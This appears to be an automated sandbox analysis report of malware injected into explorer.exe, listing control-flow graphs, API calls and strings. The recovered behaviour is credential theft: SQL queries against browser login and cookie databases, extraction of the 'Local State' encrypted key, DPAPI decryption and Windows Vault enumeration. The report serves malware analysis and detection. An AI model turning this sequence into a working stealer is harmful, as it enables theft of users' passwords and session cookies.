                                                                                                                                                      • Part of subcall function 00121B6A: CloseHandle.KERNEL32(00000000), ref: 00121B8F
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 00123778
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00123782
                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 00123789
                                                                                                                                                    • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00123794
                                                                                                                                                    • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0012383B
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,00000040), ref: 00123870
                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,?,?), ref: 0012398B
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0012399A
                                                                                                                                                    • wsprintfA.USER32 ref: 001239F1
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?), ref: 001239FD
                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00123A21
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00123A49
                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00123B13
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00123B22
                                                                                                                                                    • wsprintfA.USER32 ref: 00123B79
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00123B85
                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00123BA9
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00123BDA
                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00123C16
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                    • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                                    • API String ID: 584740257-404540950
                                                                                                                                                    • Opcode ID: 48cbe6c33b73bb97d182ebed549665eb30f9aefcfae5113fdde09ad99bc3d3fa
                                                                                                                                                    • Instruction ID: c8d9e6f22da00eb79d5b5de83d9471c67dd4b7ec253e0d0d50e4690982dcc3f0
                                                                                                                                                    • Opcode Fuzzy Hash: 48cbe6c33b73bb97d182ebed549665eb30f9aefcfae5113fdde09ad99bc3d3fa
                                                                                                                                                    • Instruction Fuzzy Hash: 48E1CA31208351AFD725DF24E884E2FBBEAAFD5344F04482CF8A587291DB79C995CB52

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 134 122198-1221c9 RtlZeroMemory GetVersionExW 135 1221d7-1221dc 134->135 136 1221cb-1221d0 134->136 138 1221de 135->138 139 1221e3-1221f6 LoadLibraryW 135->139 137 1221d2 136->137 136->138 137->135 138->139 140 12249b-1224a3 139->140 141 1221fc-12223e GetProcAddress * 5 139->141 142 122492-12249a FreeLibrary 141->142 143 122244-12224a 141->143 142->140 143->142 144 122250-122252 143->144 144->142 145 122258-12225a 144->145 145->142 146 122260-122265 145->146 146->142 147 12226b-122277 146->147 148 12227e-122280 147->148 148->142 149 122286-1222a5 148->149 151 12248b-12248f 149->151 152 1222ab-1222b3 149->152 151->142 153 122483 152->153 154 1222b9-1222c5 152->154 153->151 155 1222c9-1222db 154->155 156 1222e1-1222f1 RtlCompareMemory 155->156 157 122365-122375 RtlCompareMemory 155->157 158 122452-122475 156->158 160 1222f7-122348 call 121953 * 3 156->160 157->158 159 12237b-1223c9 call 121953 * 3 157->159 158->155 163 12247b-12247f 158->163 176 1223e4-1223ea 159->176 177 1223cb-1223dc call 121953 159->177 160->176 178 12234e-122363 call 121953 160->178 163->153 181 122431-122433 176->181 182 1223ec-1223ee 176->182 193 1223e0 177->193 178->193 186 122435-122437 call 121011 181->186 187 12243c-12243e 181->187 183 1223f0-1223f2 182->183 184 12242a-12242c call 121011 182->184 183->184 191 1223f4-1223f6 183->191 184->181 186->187 189 122440-122442 call 121011 187->189 190 122447-122449 187->190 189->190 190->158 197 12244b-12244d call 121011 190->197 191->184 196 1223f8-122406 StrStrIW 191->196 193->176 198 122426 196->198 199 122408-122421 call 1217c0 * 3 196->199 197->158 198->184 199->198
                                                                                                                                                    APIs
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,00000114), ref: 001221AF
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 001221BE
                                                                                                                                                    • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 001221E8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0012220A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00122214
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00122220
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0012222A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00122236
                                                                                                                                                    • RtlCompareMemory.NTDLL(?,00181110,00000010), ref: 001222E8
                                                                                                                                                    • RtlCompareMemory.NTDLL(?,00181110,00000010), ref: 0012236C
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                    • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 001223FE
                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 00122493
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                                    • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                    • API String ID: 2583887280-2831467701
                                                                                                                                                    • Opcode ID: 9b16d8eed1db89fa32cc2f3cd4d7108332ca85092c7c64ceebfcbdbf896221fb
                                                                                                                                                    • Instruction ID: 0e92114043981e3c6fbac4f2cd3a6fe0fd7dfc30556108c13bdd0e74341fd593
                                                                                                                                                    • Opcode Fuzzy Hash: 9b16d8eed1db89fa32cc2f3cd4d7108332ca85092c7c64ceebfcbdbf896221fb
                                                                                                                                                    • Instruction Fuzzy Hash: D6918971A08351AFD714EF61E884A2FBBE9BFA8704F00882DF98597251EB70D951CB52

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 261 123098-1230b1 call 121b6a 264 1230b7-1230cd 261->264 265 1233ba-1233c0 261->265 266 1230e3-123128 call 121000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 174bec 264->266 267 1230cf-1230d8 call 12302d 264->267 274 12339b-1233a4 DeleteFileW call 121011 266->274 275 12312e-123146 call 15eeb8 266->275 271 1230dd-1230df 267->271 271->266 279 1233a9-1233ab 274->279 280 123392-123396 call 173848 275->280 281 12314c-123158 call 1402ec 275->281 279->265 282 1233ad-1233b5 call 122ffa 279->282 280->274 287 123389-12338d call 13fb92 281->287 288 12315e-123161 281->288 282->265 287->280 290 123165-12317f call 121fa7 288->290 293 123185-123196 290->293 294 12336f-12337b call 1402ec 290->294 296 12319c-1231ac RtlCompareMemory 293->296 297 1232cd-1232e7 CryptUnprotectData 293->297 294->290 302 123381-123385 294->302 296->297 300 1231b2-1231b4 296->300 297->294 299 1232ed-1232f2 297->299 299->294 303 1232f4-12330a call 121fa7 299->303 300->297 301 1231ba-1231bf 300->301 301->297 304 1231c5-1231ca 301->304 302->287 308 123318-12332f call 121fa7 303->308 309 12330c-123312 303->309 304->297 307 1231d0-123253 RtlZeroMemory call 121000 304->307 319 123255-12326b call 121fa7 307->319 320 1232bd 307->320 315 123331-123337 308->315 316 12333d-123343 308->316 309->308 311 123314 309->311 311->308 315->316 318 123339 315->318 321 123351-12336a call 121798 * 3 316->321 322 123345-12334b 316->322 318->316 330 123279-12328e call 121fa7 319->330 331 12326d-123273 319->331 324 1232c1-1232c8 call 121011 320->324 321->294 322->321 325 12334d 322->325 324->294 325->321 339 123290-123296 330->339 340 12329c-1232bb call 121798 * 3 330->340 331->330 334 123275 331->334 334->330 339->340 341 123298 339->341 340->324 341->340
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121B82
                                                                                                                                                      • Part of subcall function 00121B6A: CloseHandle.KERNEL32(00000000), ref: 00121B8F
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 001230F9
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00123103
                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 0012310A
                                                                                                                                                    • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00123115
                                                                                                                                                    • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 001231A4
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,00000040), ref: 001231D7
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001232DF
                                                                                                                                                    • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0012339C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                                    • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                                                    • API String ID: 2757140130-4052020286
                                                                                                                                                    • Opcode ID: 6cb9ef676cc41253d44c6ff25e59266749f20b0a0fd5f1f27d929666c0a4b64c
                                                                                                                                                    • Instruction ID: 2af3063470e7258fda8b6e57845101c2d10236ec0625148708bc3e163d58fcc5
                                                                                                                                                    • Opcode Fuzzy Hash: 6cb9ef676cc41253d44c6ff25e59266749f20b0a0fd5f1f27d929666c0a4b64c
                                                                                                                                                    • Instruction Fuzzy Hash: CD91C931208351AFD710DF24E884A2FBBE9BFD5344F00092DF495922A0DB38CE58CB62

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 348 123ed9-123ee7 349 123fd1-123fdb 348->349 350 123eed-123ef1 348->350 350->349 351 123ef7-123f21 call 121000 PathCombineW FindFirstFileW 350->351 354 123f27-123f30 351->354 355 123fca-123fcc call 121011 351->355 356 123f32-123f40 lstrcmpiW 354->356 357 123f78-123f86 lstrcmpiW 354->357 355->349 359 123f42-123f54 lstrcmpiW 356->359 360 123faf-123fbd FindNextFileW 356->360 357->360 361 123f88-123fa3 call 121000 PathCombineW call 123e04 357->361 359->360 362 123f56-123f76 call 121000 PathCombineW call 123ed9 359->362 360->354 364 123fc3-123fc4 FindClose 360->364 370 123fa8-123faa call 121011 361->370 362->370 364->355 370->360
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 00123F0A
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00123F16
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,001762CC), ref: 00123F38
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,001762D0), ref: 00123F4C
                                                                                                                                                    • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00123F69
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,Local State), ref: 00123F7E
                                                                                                                                                    • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00123F9B
                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00123FB5
                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 00123FC4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                                                    • String ID: *.*$Local State
                                                                                                                                                    • API String ID: 3923353463-3324723383
                                                                                                                                                    • Opcode ID: e75e4c35eb180898c3791ef6accae19b5cbb61945ee759e48ec4733fdc75d447
                                                                                                                                                    • Instruction ID: 3e15b4700bb1c0b205287581d9e104512b3e2aa4ccd0fdd684b4b8b4a0e4a6c4
                                                                                                                                                    • Opcode Fuzzy Hash: e75e4c35eb180898c3791ef6accae19b5cbb61945ee759e48ec4733fdc75d447
                                                                                                                                                    • Instruction Fuzzy Hash: 9621BE316007656BD710AB70BC4CE3B76BCAFD5311F040529F82AC2192EB7C8AE98662

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 373 121d4a-121d5c 374 121d62-121d66 373->374 375 121eb4-121ebe 373->375 374->375 376 121d6c-121d77 call 1219b4 374->376 379 121d8b-121d97 call 121953 376->379 380 121d79-121d89 call 121953 376->380 385 121d9b-121d9d 379->385 380->385 385->375 386 121da3-121db4 FindFirstFileW 385->386 387 121dba 386->387 388 121ead-121eaf call 121011 386->388 390 121dbe-121dc3 387->390 388->375 391 121dc5-121dd7 lstrcmpiW 390->391 392 121e3d-121e6a call 121953 call 12199d lstrcmpiW 390->392 394 121e8e-121e9c FindNextFileW 391->394 395 121ddd-121def lstrcmpiW 391->395 403 121e87-121e89 call 121011 392->403 404 121e6c-121e75 call 121cf7 392->404 394->390 396 121ea2-121ea9 FindClose 394->396 395->394 398 121df5-121e00 call 1219b4 395->398 396->388 405 121e02-121e07 398->405 406 121e09 398->406 403->394 404->403 412 121e77-121e7f 404->412 408 121e0b-121e3b call 121953 call 12199d call 121d4a 405->408 406->408 408->403 412->403
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 001219B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00122CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 001219C4
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00121DA9
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,001762CC), ref: 00121DCF
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,001762D0), ref: 00121DE7
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00121E62
                                                                                                                                                      • Part of subcall function 00121CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00122C27), ref: 00121D02
                                                                                                                                                      • Part of subcall function 00121CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00121D0D
                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00121E94
                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 00121EA3
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                                    • String ID: *.*$\*.*
                                                                                                                                                    • API String ID: 232625764-1692270452
                                                                                                                                                    • Opcode ID: b7b240df1a16e1155bf1f1ae594af04ff19a2809b41e5b8a52d7a55644e23619
                                                                                                                                                    • Instruction ID: 618635e5ffdc2b6fb3df5377ff9371990356c6f4951066c5705c6e99c4919a03
                                                                                                                                                    • Opcode Fuzzy Hash: b7b240df1a16e1155bf1f1ae594af04ff19a2809b41e5b8a52d7a55644e23619
                                                                                                                                                    • Instruction Fuzzy Hash: 1731C930304762BBCB21EB74AC98A7F76FAAFF4340F014529FC4982251EB35CDA99651

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 483 123e04-123e11 call 121b6a 486 123e17-123e22 call 121c31 483->486 487 123ed4-123ed8 483->487 486->487 490 123e28-123e34 call 122fb1 486->490 493 123e3a-123e4f call 12123b 490->493 494 123ec8-123ecc 490->494 497 123ec0-123ec7 call 121011 493->497 498 123e51-123e58 493->498 494->487 497->494 500 123e5a-123e6a 498->500 501 123ebf 498->501 503 123eb8-123eba call 121011 500->503 504 123e6c-123e7c RtlCompareMemory 500->504 501->497 503->501 504->503 506 123e7e-123ea6 CryptUnprotectData 504->506 506->503 507 123ea8-123ead 506->507 507->503 508 123eaf-123eb3 507->508 508->503
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121B82
                                                                                                                                                      • Part of subcall function 00121B6A: CloseHandle.KERNEL32(00000000), ref: 00121B8F
                                                                                                                                                      • Part of subcall function 00121C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00121C46
                                                                                                                                                      • Part of subcall function 00121C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00123FA8), ref: 00121C56
                                                                                                                                                      • Part of subcall function 00121C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00121C76
                                                                                                                                                      • Part of subcall function 00121C31: CloseHandle.KERNEL32(00000000), ref: 00121C91
                                                                                                                                                      • Part of subcall function 00122FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00122FC1
                                                                                                                                                      • Part of subcall function 00122FB1: lstrlen.KERNEL32("encrypted_key":",?,00123FA8), ref: 00122FCE
                                                                                                                                                      • Part of subcall function 00122FB1: StrStrIA.SHLWAPI("encrypted_key":",0017692C), ref: 00122FDD
                                                                                                                                                      • Part of subcall function 0012123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00123E4B,00000000), ref: 0012124A
                                                                                                                                                      • Part of subcall function 0012123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00121268
                                                                                                                                                      • Part of subcall function 0012123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00121295
                                                                                                                                                    • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00123E74
                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00123E9E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                                    • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                                    • API String ID: 3076719866-957854035
                                                                                                                                                    • Opcode ID: 65e771e6b8fe4fc690eba3737bbf9fda58571b521eeca9c6c13b3cf6825f1155
                                                                                                                                                    • Instruction ID: 43d5cf59bb497ee8688b2bfc229c33b628c4eb7530a0083577d1825b4a36a411
                                                                                                                                                    • Opcode Fuzzy Hash: 65e771e6b8fe4fc690eba3737bbf9fda58571b521eeca9c6c13b3cf6825f1155
                                                                                                                                                    • Instruction Fuzzy Hash: B521F6326043656BD715EB68AC80A7FB2EDAFA4700F45092DF850C7201EB78CE5D87A2

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 665 189247-189275 666 1892e1-1892eb 665->666 667 189277-1892a3 665->667 668 1892ed-1892f8 666->668 669 18930e-189342 666->669 670 1892aa-1892be 667->670 671 1892a5-1892a7 667->671 672 189344-189346 669->672 673 189238-189245 671->673 674 1892a9 671->674 675 189349-18934c 672->675 676 189381-1893a5 672->676 673->665 674->670 675->672 677 18934e-18937a 675->677 678 1893ab-1893b8 676->678 679 18958d 676->679 680 18937c 677->680 681 1893e1 677->681 682 1893ca-1893cf 678->682 679->679 680->676 683 1893e3-1893e7 681->683 684 1893d1 682->684 685 1893e9 683->685 686 1893f4-1893f7 683->686 687 1893c0-1893c5 684->687 688 1893d3 684->688 689 1893eb-1893f2 685->689 690 189413-189418 685->690 691 1893f9-1893fe 686->691 692 189400-189402 686->692 693 1893c6-1893c8 687->693 694 1893d8-1893da 688->694 689->686 689->690 695 18941a-189423 690->695 696 18942b-18942d 690->696 691->692 692->694 693->682 693->684 694->683 697 1893dc-1893de 694->697 698 18949a-18949d 695->698 699 189425-189429 695->699 700 18942f-189434 696->700 701 189436 696->701 697->681 704 1894a2-1894a5 698->704 699->701 700->701 702 189438-18943b 701->702 703 189404-189406 701->703 706 18943d-189442 702->706 707 189444 702->707 708 189408-18940d 703->708 709 18940f-189411 703->709 705 1894a7-1894a9 704->705 705->704 710 1894ab-1894ae 705->710 706->707 707->703 711 189446-189448 707->711 708->709 712 189465-189474 709->712 710->704 713 1894b0-1894cc 710->713 714 18944a-18944f 711->714 715 189451-189455 711->715 716 189484-189491 712->716 717 189476-18947d 712->717 713->705 718 1894ce 713->718 714->715 715->711 719 189457 715->719 716->716 721 189493-189495 716->721 717->717 720 18947f 717->720 722 1894d4-1894d8 718->722 723 189459-189460 719->723 724 189462 719->724 720->693 721->693 725 1894da-1894f0 LoadLibraryA 722->725 726 18951f-189522 722->726 723->711 723->724 724->712 727 1894f1-1894f6 725->727 728 189525-18952c 726->728 727->722 729 1894f8-1894fa 727->729 730 18952e-189530 728->730 731 189550-189580 VirtualProtect * 2 728->731 733 1894fc-189502 729->733 734 189503-189510 GetProcAddress 729->734 735 189532-189541 730->735 736 189543-18954e 730->736 732 189584-189588 731->732 732->732 737 18958a 732->737 733->734 738 189519-18951c 734->738 739 189512-189517 734->739 735->728 736->735 737->679 739->727
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000187000.00000040.80000000.00040000.00000000.sdmp, Offset: 00187000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_187000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ee47bba1dae3e39bc8cddbd947239c221e608ccae016e28ca946f7a11a4fbd13
                                                                                                                                                    • Instruction ID: e4a66faf1144ff9cdaa8f1e07df35008852dde82cb0bacf5b1bbbb9b8d40481c
                                                                                                                                                    • Opcode Fuzzy Hash: ee47bba1dae3e39bc8cddbd947239c221e608ccae016e28ca946f7a11a4fbd13
                                                                                                                                                    • Instruction Fuzzy Hash: 17A17EB2A147525FD721AE78CDD06B0BBA0FB52324B2D076DC9D1CB2C2E7605A07CB51
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0012116F
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00124BB6
                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00124BBF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1675517319-0
                                                                                                                                                    • Opcode ID: 92a56bc2ced3b6b6368695aa7b05d65ba2d3453c0a322badb19213075bc9f064
                                                                                                                                                    • Instruction ID: 017c7d6194146e7b3b68613b3590b9b570dfa3f1c9d5bdc4e5bc881eb51a0e8e
                                                                                                                                                    • Opcode Fuzzy Hash: 92a56bc2ced3b6b6368695aa7b05d65ba2d3453c0a322badb19213075bc9f064
                                                                                                                                                    • Instruction Fuzzy Hash: B1E0D832804230BBC758BB30BC09E4B3B5C9FB5361F10C914B25586091CB31C8A08B50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0012116F
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00121A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2), ref: 00121020
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2580854192-0
                                                                                                                                                    • Opcode ID: 6093c25bc6165c91cdb1603b6baaaf657496b6d16ba7313fd0535b062085021f
                                                                                                                                                    • Instruction ID: 6f385083144908c4809ad0042320b2fef70ca9c573a17580f2498b5823cf72ce
                                                                                                                                                    • Opcode Fuzzy Hash: 6093c25bc6165c91cdb1603b6baaaf657496b6d16ba7313fd0535b062085021f
                                                                                                                                                    • Instruction Fuzzy Hash: B0C08C3100027066C96067B03C0CBCA2B28CF99222F040442B50993542CB628CD082A0
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemInfo.KERNELBASE(001820A4,00000001,00000000,0000000A,00173127,001228DA,00000000,?), ref: 0012BFFC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                    • Opcode ID: 7c629a8d01a223269415cfa4738866a1dc916aac974b8dcf83563b892a84b0f5
                                                                                                                                                    • Instruction ID: b941e5a8e386019c64a545b3cc680f58ac35a01c2aa111f404fc53ced32ffe5a
                                                                                                                                                    • Opcode Fuzzy Hash: 7c629a8d01a223269415cfa4738866a1dc916aac974b8dcf83563b892a84b0f5
                                                                                                                                                    • Instruction Fuzzy Hash: 5BE0483278432075F61537F87D47F56154D4BE0F50F604A15F710A90CEEFD592621E26

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121B82
                                                                                                                                                      • Part of subcall function 00121B6A: CloseHandle.KERNEL32(00000000), ref: 00121B8F
